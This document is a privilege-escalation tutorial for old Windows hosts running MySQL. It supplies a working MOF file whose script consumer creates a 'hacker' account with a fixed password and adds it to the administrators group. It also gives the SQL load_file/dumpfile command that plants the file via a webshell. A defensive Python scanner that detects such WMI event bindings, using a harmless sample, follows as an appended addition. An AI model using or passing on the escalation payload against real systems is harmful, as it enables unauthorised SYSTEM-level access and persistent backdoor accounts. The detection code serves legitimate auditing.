The principle behind MOF privilege escalation is that a .mof file placed in the MOF directory (C:\WINDOWS\system32\wbem\mof) is picked up and executed automatically after a short while, and it runs with SYSTEM privileges. We take advantage of this to have it run the commands we want.
Conditions
1. Windows version lower than Windows Server 2008.
2. The database is MySQL < 5.7, the login account and password are known, and remote connections are allowed.
Once you have the root account and password you can enable remote connections.
Here a webshell is used to upload a file to the server locally:
test.mof
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hacker P@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators hacker /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
Then use a SQL statement to move it into C:\WINDOWS\system32\wbem\mof:
select load_file('C:/phpStudy/WWW/test.mof') into dumpfile 'C:/WINDOWS/system32/wbem/mof/test.mof'
After that the hacker account is created and placed in the administrators group.
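As an added example (not part of the original post), the following Python scanner parses a MOF file like the one above and flags the pattern this technique leaves behind: a __FilterToConsumerBinding tying an event filter to an ActiveScriptEventConsumer or CommandLineEventConsumer. It can be run over files found in the wbem\mof directory when auditing a host; SAMPLE_MOF is a constructed copy of test.mof with a harmless payload, and the class names are real WMI classes.

```python
import re

# Consumer classes whose instances run script or commands when their bound filter fires.
EXEC_CONSUMERS = ("ActiveScriptEventConsumer", "CommandLineEventConsumer")

INSTANCE_RE = re.compile(r'instance\s+of\s+(\w+)(?:\s+as\s+\$\w+)?\s*\{(.*?)\};', re.S)
PROP_RE = re.compile(r'(\w+)\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+|[^;]+);')
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

def parse_mof(text):
    """Return [(class_name, {property: value}), ...] for each instance block in MOF text."""
    instances = []
    for cls, body in INSTANCE_RE.findall(text):
        props = {}
        for name, raw in PROP_RE.findall(body):
            parts = STRING_RE.findall(raw)  # adjacent string literals concatenate, as in MOF
            props[name] = "".join(parts) if parts else raw.strip()
        instances.append((cls, props))
    return instances

def suspicious_subscriptions(text):
    """Flag a MOF file that binds an event filter to a script/command consumer."""
    instances = parse_mof(text)
    if not any(cls == "__FilterToConsumerBinding" for cls, _ in instances):
        return []
    return [f"{cls} {props.get('Name', '?')}: "
            f"{props.get('ScriptText') or props.get('CommandLineTemplate', '')}"
            for cls, props in instances if cls in EXEC_CONSUMERS]

# Constructed sample mirroring the layout of test.mof above, with a harmless payload.
SAMPLE_MOF = r"""
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"cmd.exe /c whoami\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
"""

if __name__ == "__main__":
    for finding in suspicious_subscriptions(SAMPLE_MOF):
        print("SUSPICIOUS:", finding)
```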